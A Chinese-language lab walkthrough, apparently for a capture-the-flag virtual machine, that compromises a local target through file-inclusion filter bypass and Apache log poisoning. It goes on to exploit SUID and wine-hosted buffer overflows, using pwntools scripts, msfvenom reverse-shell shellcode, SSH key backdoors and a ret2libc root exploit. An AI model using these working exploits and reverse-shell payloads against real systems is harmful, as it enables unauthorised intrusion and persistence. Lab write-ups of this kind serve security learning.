所渗透的靶机是192.168.56.104
端口扫描 sudo nmap --min-rate 10000 -p- 192.168.56.104 [sudo] mikannse 的密码: Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-04 04:12 UTC Nmap scan report for 192.168.56.104 (192.168.56.104) Host is up (0.00010s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:49:23:DF (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 3.12 seconds
sudo nmap -sT -sV -sC -O -p22,80 192.168.56.104 Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-04 04:12 UTC Nmap scan report for 192.168.56.104 (192.168.56.104) Host is up (0.00027s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4d:0e:bf:5f:7c:42:4a:85:95:14:07:6c:07:f8:65:0c (ECDSA) |_ 256 61:cb:06:4a:a5:bf:a2:af:64:0c:9e:d4:20:b0:50:6f (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Coming Soon 10 |_http-server-header: Apache/2.4.52 (Ubuntu) MAC Address: 08:00:27:49:23:DF (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds
Web(Getshell) 访问80端口,看上去只有一个门户网站。没有域名所以发现不了虚拟主机。扫目录也没有发现什么。网站也没有任何功能。剩下只有URL的page参数可以做文章了。试了一下文件包含”../../../../../../etc/passwd”但是响应空白界面。也不能远程文件包含。
也许被过滤了,发现双写可以绕过”….//….//….//….//etc//passwd”可以读取。估计是过滤了”../“这样的组合。远程文件包含估计就是用不了了。能文件包含的话,要getshell就可以考虑apache的日志中毒了,这个网站也是由apache,php搭建的。
curl -s "http://192.168.56.104/index.php?page=....//....//....//var/log/apache2/access.log" -vv Trying 192.168.56.104:80... Connected to 192.168.56.104 (192.168.56.104) port 80 > GET /index.php?page=....//....//....//var/log/apache2/access.log HTTP/1.1 > Host: 192.168.56.104 > User-Agent: curl/8.3.0 > Accept: */* > > < HTTP/1.1 200 OK > < Date: Sun, 04 Feb 2024 05:15:43 GMT > < Server: Apache/2.4.52 (Ubuntu) > < Vary: Accept-Encoding > < Content-Length: 380 > < Content-Type: text/html; charset=UTF-8 > < > 192.168.100.85 - - [24/Jul/2023:05:57:28 +0000] "GET / HTTP/1.1" 200 6111 "-" "-" > 192.168.56.102 - - [04/Feb/2024:05:15:26 +0000] "GET /index.php?page=....//....//....//var/log/apache2/access.log HTTP/1.1" 200 253 "-" "curl/8.3.0" > 192.168.56.102 - - [04/Feb/2024:05:15:38 +0000] "GET /index.php?page=....//....//....//var/log/apache2/access.log HTTP/1.1" 200 403 "-" "curl/8.3.0" Connection #0 to host 192.168.56.104 left intact
确实能够读取日志文件,但是不知道为什么,每次做到apache日志中毒的房间时有时候会返回500的服务器内部错误,需要重置靶机才能恢复。。。
curl -s "http://192.168.56.104/" -A "<?php system(\$_GET['shell']); ?>" -vv
利用user-agent写入一句话木马
curl -s "http://192.168.56.104/index.php?page=....//....//....//var/log/apache2/access.log&shell=whoami" -vv
发现确实是有回显结果的,写一个php反弹shell然后访问触发
curl -s "http://192.168.56.104/index.php?page=....//....//....//var/log/apache2/access.log&shell=curl%20http://192.168.56.102/reverseshell.php%20-o%20shell.php%20&&%20chmod%20+x%20shell.php" -vv
转移shell至meterpreter
Linux缓冲区溢出 发现存在三个用户,但暂时都还没有权限。但是web目录也是没有找到任何敏感信息,没有特别的进程之类的。。www用户没有sudo,但是找到了SUID程序/opt/others/program
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
放到ida中反编译一下,当输入的参数个数大于1时,调用vuln函数,这个函数的目的是复制输入字符串 a1 到一个本地缓冲区dest中,使用的是strcpy函数,也许存在缓冲区溢出
用pwngdb跑一下二进制程序
chmod +x program gdb -q program
IDA中显示desk的大小是128,以防万一,还是调试一下,先生成200个字符试试
pwndbg> cyclic 200 aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa pwndbg> run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa Starting program: /home/mikannse/桌面/program aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
pwndbg> x/gx $rsp 0x7fffffffdd08: 0x6161616161616172
rsp的地址在0x6161616161616172
pwndbg> cyclic -l 0x6161616161616172 Finding cyclic pattern of 8 bytes: b'raaaaaaa' (hex: 0x7261616161616161) Found at offset 136
偏移在136,应该就是之前的128+8(rbp)。
ropper --file program --jmp rax JMP Instructions ================ 0x0000000000401014: call rax; 0x00000000004010cc: jmp rax; 0x000000000040110e: jmp rax; 3 gadgets found
搜索程序中可以利用的jmp跳转指令,exp如下
#!/usr/bin/python3 from pwn import * offset = 136 shellcode = asm(shellcraft.amd64.sh(), arch="amd64") junk = b"A" * (offset - len(shellcode)) callrax = p32(0x4010cc) payload = shellcode + junk + callrax shell = process(["./opt/others/program", payload]) shell.interactive()
运行之后虽然获得了会话,但是身份还是www-data。。。似乎需要手动更改uid
#!/usr/bin/python3 from pwn import * offset = 136 shellcode = b"" shellcode += asm(shellcraft.amd64.setresuid(1002, 1002), arch="amd64") shellcode += asm(shellcraft.amd64.sh(), arch="amd64") junk = b"A" * (offset - len(shellcode)) callrax = p32(0x4010cc) payload = shellcode + junk + callrax shell = process(["/opt/others/program", payload]) shell.interactive()
现在我们是cxdxnt!
做一个ssh后门
ssh-keygen cd .ssh cp id_rsa.pub authorized_keys
复制一份私钥至kali
sudo -l
Windows缓冲区溢出 发现可以以gato身份用wine指令执行一个/opt/projects/MyFirstProgram.exe
把可执行文件放到ida中反编译一下,但是看不懂QAQ
算了先用InmunityDebugger在Win环境跑一下程序,并且程序监听着42424端口。试着是不是缓冲区溢出,在一次性灌入600字符后,程序崩溃了。应该就是缓冲区溢出了
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300
先生成300字符
netcat 连接并且发送过去之后程序还是崩溃了
在IDebugger中查看EIP的值为0x39654138
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x39654138
得到offset是146
测试一下坏字节
from pwn import remote badchars=b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' exp=b'A'*146+b'B'*4+badchars s=remote("192.168.233.1",42424) s.sendline(exp) s.close()
有\x00和\x0a两个坏字节
!mona jmp -r esp -m myfirstprogram.exe
找jmp的指令地址0x080414c3
生成exp
msfvenom -p windows/shell_reverse_tcp lhost=192.168.233.3 lport=1234 -f python -b '\x00\x0a' >poc.py
那么就可以构造最终的exp了
from pwn import remote jmp_esp=b'\xC3\x14\x04\x08' some_junk=b'\x90'*16 buf = b"" buf += b"\xdb\xd2\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x52\xbf" buf += b"\x95\xd6\xc9\x99\x31\x78\x17\x83\xc0\x04\x03\xed" buf += b"\xc5\x2b\x6c\xf1\x02\x29\x8f\x09\xd3\x4e\x19\xec" buf += b"\xe2\x4e\x7d\x65\x54\x7f\xf5\x2b\x59\xf4\x5b\xdf" buf += b"\xea\x78\x74\xd0\x5b\x36\xa2\xdf\x5c\x6b\x96\x7e" buf += b"\xdf\x76\xcb\xa0\xde\xb8\x1e\xa1\x27\xa4\xd3\xf3" buf += b"\xf0\xa2\x46\xe3\x75\xfe\x5a\x88\xc6\xee\xda\x6d" buf += b"\x9e\x11\xca\x20\x94\x4b\xcc\xc3\x79\xe0\x45\xdb" buf += b"\x9e\xcd\x1c\x50\x54\xb9\x9e\xb0\xa4\x42\x0c\xfd" buf += b"\x08\xb1\x4c\x3a\xae\x2a\x3b\x32\xcc\xd7\x3c\x81" buf += b"\xae\x03\xc8\x11\x08\xc7\x6a\xfd\xa8\x04\xec\x76" buf += b"\xa6\xe1\x7a\xd0\xab\xf4\xaf\x6b\xd7\x7d\x4e\xbb" buf += b"\x51\xc5\x75\x1f\x39\x9d\x14\x06\xe7\x70\x28\x58" buf += b"\x48\x2c\x8c\x13\x65\x39\xbd\x7e\xe2\x8e\x8c\x80" buf += b"\xf2\x98\x87\xf3\xc0\x07\x3c\x9b\x68\xcf\x9a\x5c" buf += b"\x8e\xfa\x5b\xf2\x71\x05\x9c\xdb\xb5\x51\xcc\x73" buf += b"\x1f\xda\x87\x83\xa0\x0f\x07\xd3\x0e\xe0\xe8\x83" buf += b"\xee\x50\x81\xc9\xe0\x8f\xb1\xf2\x2a\xb8\x58\x09" buf += b"\xbd\x07\x34\xf8\x3e\xe0\x47\xfa\x44\x22\xce\x1c" buf += b"\x2e\xd2\x87\xb7\xc7\x4b\x82\x43\x79\x93\x18\x2e" buf += b"\xb9\x1f\xaf\xcf\x74\xe8\xda\xc3\xe1\x18\x91\xb9" buf += b"\xa4\x27\x0f\xd5\x2b\xb5\xd4\x25\x25\xa6\x42\x72" buf += b"\x62\x18\x9b\x16\x9e\x03\x35\x04\x63\xd5\x7e\x8c" buf += b"\xb8\x26\x80\x0d\x4c\x12\xa6\x1d\x88\x9b\xe2\x49" buf += b"\x44\xca\xbc\x27\x22\xa4\x0e\x91\xfc\x1b\xd9\x75" buf += b"\x78\x50\xda\x03\x85\xbd\xac\xeb\x34\x68\xe9\x14" buf += b"\xf8\xfc\xfd\x6d\xe4\x9c\x02\xa4\xac\xad\x48\xe4" buf += b"\x85\x25\x15\x7d\x94\x2b\xa6\xa8\xdb\x55\x25\x58" buf += b"\xa4\xa1\x35\x29\xa1\xee\xf1\xc2\xdb\x7f\x94\xe4" buf += b"\x48\x7f\xbd" exp=b'A'*146+jmp_esp+some_junk+buf s=remote("192.168.233.1",42424) s.sendline(exp) s.close()
开启监听,执行exp,成功!
因为先前是开在win环境上的,现在只需要更换ip即可
msfvenom -p windows/shell_reverse_tcp lhost=192.168.56.102 lport=1234 -f python -b '\x00\x0a' >poc.py
from pwn import remote jmp_esp=b'\xC3\x14\x04\x08' some_junk=b'\x90'*16 buf = b"" buf += b"\xdd\xc6\xbd\x1c\x6e\x1b\x2c\xd9\x74\x24\xf4\x5a" buf += b"\x31\xc9\xb1\x52\x83\xc2\x04\x31\x6a\x13\x03\x76" buf += b"\x7d\xf9\xd9\x7a\x69\x7f\x21\x82\x6a\xe0\xab\x67" buf += b"\x5b\x20\xcf\xec\xcc\x90\x9b\xa0\xe0\x5b\xc9\x50" buf += b"\x72\x29\xc6\x57\x33\x84\x30\x56\xc4\xb5\x01\xf9" buf += b"\x46\xc4\x55\xd9\x77\x07\xa8\x18\xbf\x7a\x41\x48" buf += b"\x68\xf0\xf4\x7c\x1d\x4c\xc5\xf7\x6d\x40\x4d\xe4" buf += b"\x26\x63\x7c\xbb\x3d\x3a\x5e\x3a\x91\x36\xd7\x24" buf += b"\xf6\x73\xa1\xdf\xcc\x08\x30\x09\x1d\xf0\x9f\x74" buf += b"\x91\x03\xe1\xb1\x16\xfc\x94\xcb\x64\x81\xae\x08" buf += b"\x16\x5d\x3a\x8a\xb0\x16\x9c\x76\x40\xfa\x7b\xfd" buf += b"\x4e\xb7\x08\x59\x53\x46\xdc\xd2\x6f\xc3\xe3\x34" buf += b"\xe6\x97\xc7\x90\xa2\x4c\x69\x81\x0e\x22\x96\xd1" buf += b"\xf0\x9b\x32\x9a\x1d\xcf\x4e\xc1\x49\x3c\x63\xf9" buf += b"\x89\x2a\xf4\x8a\xbb\xf5\xae\x04\xf0\x7e\x69\xd3" buf += b"\xf7\x54\xcd\x4b\x06\x57\x2e\x42\xcd\x03\x7e\xfc" buf += b"\xe4\x2b\x15\xfc\x09\xfe\xba\xac\xa5\x51\x7b\x1c" buf += b"\x06\x02\x13\x76\x89\x7d\x03\x79\x43\x16\xae\x80" buf += b"\x04\xd9\x87\xb2\xb2\xb1\xd5\xc2\x3e\x90\x53\x24" buf += b"\x54\x04\x32\xff\xc1\xbd\x1f\x8b\x70\x41\x8a\xf6" buf += b"\xb3\xc9\x39\x07\x7d\x3a\x37\x1b\xea\xca\x02\x41" buf += b"\xbd\xd5\xb8\xed\x21\x47\x27\xed\x2c\x74\xf0\xba" buf += b"\x79\x4a\x09\x2e\x94\xf5\xa3\x4c\x65\x63\x8b\xd4" buf += b"\xb2\x50\x12\xd5\x37\xec\x30\xc5\x81\xed\x7c\xb1" buf += b"\x5d\xb8\x2a\x6f\x18\x12\x9d\xd9\xf2\xc9\x77\x8d" buf += b"\x83\x21\x48\xcb\x8b\x6f\x3e\x33\x3d\xc6\x07\x4c" buf += b"\xf2\x8e\x8f\x35\xee\x2e\x6f\xec\xaa\x5f\x3a\xac" buf += b"\x9b\xf7\xe3\x25\x9e\x95\x13\x90\xdd\xa3\x97\x10" buf += b"\x9e\x57\x87\x51\x9b\x1c\x0f\x8a\xd1\x0d\xfa\xac" buf += b"\x46\x2d\x2f" exp=b'A'*146+jmp_esp+some_junk+buf s=remote("192.168.56.104",42424) s.sendline(exp) s.close()
在靶机中,开启程序
sudo -u gato /usr/bin/wine /opt/projects/MyFirstProgram.exe
执行exp,成功收到反弹shell!
wine命令是为了在linux上开启为Windows设计的程序,那我们现在只要将exp中的反弹shell改成为linux的就可以了
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.56.102 lport=1234 -f python -b '\x00\x0a' >poc1.py
from pwn import remote jmp_esp=b'\xC3\x14\x04\x08' some_junk=b'\x90'*16 buf = b"" buf += b"\xbe\xf7\x8d\x19\xaf\xdb\xd1\xd9\x74\x24\xf4\x5a" buf += b"\x33\xc9\xb1\x12\x83\xea\xfc\x31\x72\x0e\x03\x85" buf += b"\x83\xfb\x5a\x58\x47\x0c\x47\xc9\x34\xa0\xe2\xef" buf += b"\x33\xa7\x43\x89\x8e\xa8\x37\x0c\xa1\x96\xfa\x2e" buf += b"\x88\x91\xfd\x46\xcb\xca\xc6\xf0\xa3\x08\x37\xf8" buf += b"\xe1\x84\xd6\xb0\x60\xc7\x49\xe3\xdf\xe4\xe0\xe2" buf += b"\xed\x6b\xa0\x8c\x83\x44\x36\x24\x34\xb4\x97\xd6" buf += b"\xad\x43\x04\x44\x7d\xdd\x2a\xd8\x8a\x10\x2c" exp=b'A'*146+jmp_esp+some_junk+buf s=remote("192.168.56.104",42424) s.sendline(exp) s.close()
现在我们是gato!!!
给gato用户也做一个ssh后门
提权 最后一步是利用/opt/fixed/new了,但是这一块内容还没有学啊qwq,抄大佬的WP了
#!/usr/bin/python2 from pwn import p32 offset = 140 junk = b"A" * offset libc_base = 0xf7cfe000 system = p32(libc_base + 0x00048150) exit = p32(libc_base + 0x0003a440) bin_sh = p32(libc_base + 0x1bd0f5) payload = junk + system + exit + bin_sh print(payload)
然后循环执行:
while true; do /opt/fixed/new $(python2 exp.py); done
过了一会儿之后,我们是ROOT!
碎碎念 随便找的一个靶机没想到那么多PWN的知识点233,不过复习了日志中毒和缓冲区溢出还算不错,提权那步有空再学罢(
